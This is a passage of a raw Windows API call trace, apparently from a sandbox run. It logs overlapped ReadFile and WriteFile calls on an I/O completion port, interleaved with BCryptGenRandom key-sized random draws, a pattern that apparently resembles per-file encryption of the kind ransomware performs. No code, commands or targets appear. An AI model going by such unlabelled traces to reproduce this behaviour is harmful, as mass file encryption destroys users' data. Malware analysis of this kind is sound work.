[0141.965] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.972] CloseHandle (hObject=0x308) returned 1 [0141.973] free (_Block=0x3d70450) [0141.973] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.978] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4054, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0141.988] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0141.998] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x1acc, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.010] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.021] ReadFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x22a0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0142.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.040] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2a54, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.043] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.093] WriteFile (in: hFile=0x338, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x36c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.093] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.103] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.103] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.103] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0142.104] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.104] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.104] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0142.104] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.104] free (_Block=0x3e305b8) [0142.104] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.104] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.105] free (_Block=0x1fa91d0) [0142.105] free (_Block=0x77d7a8) [0142.105] free (_Block=0x1fa90b8) [0142.105] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0142.105] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.111] CloseHandle (hObject=0x3cc) returned 1 [0142.111] free (_Block=0x3d70450) [0142.111] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.117] ReadFile (in: hFile=0xec, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x1ba0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0142.137] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.148] ReadFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x12c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0142.152] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.161] ReadFile (in: hFile=0x338, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xed8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0142.161] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.173] CloseHandle (hObject=0x308) returned 1 [0142.177] free (_Block=0x3df0008) [0142.177] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.185] CloseHandle (hObject=0xec) returned 1 [0142.185] free (_Block=0x3e70008) [0142.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.190] WriteFile (in: hFile=0x3cc, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1b70, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.190] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.195] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1574, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.208] WriteFile (in: hFile=0xec, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.208] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.812] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.812] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.816] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x2020, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.873] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.879] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x12c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0142.879] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0142.891] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.891] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.891] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0142.891] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.891] free (_Block=0x3e305b8) [0142.892] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.892] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.892] free (_Block=0x1fa91d0) [0142.892] free (_Block=0x77d7a8) [0142.892] free (_Block=0x1fa90b8) [0142.892] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.907] CloseHandle (hObject=0x308) returned 1 [0142.907] free (_Block=0x3e70008) [0142.908] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.917] ReadFile (in: hFile=0x338, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9d27, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0142.919] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.927] CloseHandle (hObject=0xec) returned 1 [0142.927] free (_Block=0x1ff1e60) [0142.927] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.937] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0142.938] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0142.938] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0142.938] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0142.939] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0142.939] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0142.939] free (_Block=0x3e305b8) [0142.939] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0142.939] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0142.939] free (_Block=0x1fa91d0) [0142.939] free (_Block=0x77d7a8) [0142.939] free (_Block=0x1fa90b8) [0142.940] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0142.940] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.949] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x8380, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0142.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.953] ReadFile (in: hFile=0xec, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0xc056, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0142.955] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0142.955] CloseHandle (hObject=0xec) returned 1 [0142.956] free (_Block=0x1ff1e60) [0142.956] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.644] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.645] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.645] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0143.645] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.646] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.646] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0143.646] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.646] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.646] free (_Block=0x3e305b8) [0143.646] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.646] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.646] free (_Block=0x1fa91d0) [0143.646] free (_Block=0x77d7a8) [0143.646] free (_Block=0x1fa90b8) [0143.647] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0143.647] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.658] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.658] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0143.658] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.659] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.659] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0143.659] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.659] free (_Block=0x3e305b8) [0143.659] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.659] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.660] free (_Block=0x1fa91d0) [0143.660] free (_Block=0x77d7a8) [0143.660] free (_Block=0x1fa90b8) [0143.660] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.660] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.670] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0143.671] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.671] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.671] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0143.671] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.671] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.672] free (_Block=0x3e305b8) [0143.672] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.672] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.672] free (_Block=0x1fa91d0) [0143.672] free (_Block=0x77d7a8) [0143.672] free (_Block=0x1fa90b8) [0143.672] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0143.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.673] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x5290, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0143.673] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.776] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x45d0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.776] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.778] CloseHandle (hObject=0x308) returned 1 [0143.778] free (_Block=0x3d70450) [0143.778] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.793] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0143.794] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0143.794] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0143.794] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0143.794] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0143.794] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0143.794] free (_Block=0x3e305b8) [0143.795] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0143.795] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0143.795] free (_Block=0x1fa91d0) [0143.795] free (_Block=0x77d7a8) [0143.795] free (_Block=0x1fa90b8) [0143.795] WriteFile (in: hFile=0x338, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0143.795] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.808] CloseHandle (hObject=0x3cc) returned 1 [0143.808] free (_Block=0x3e70008) [0143.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.819] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x8a5b, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0143.820] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0143.832] 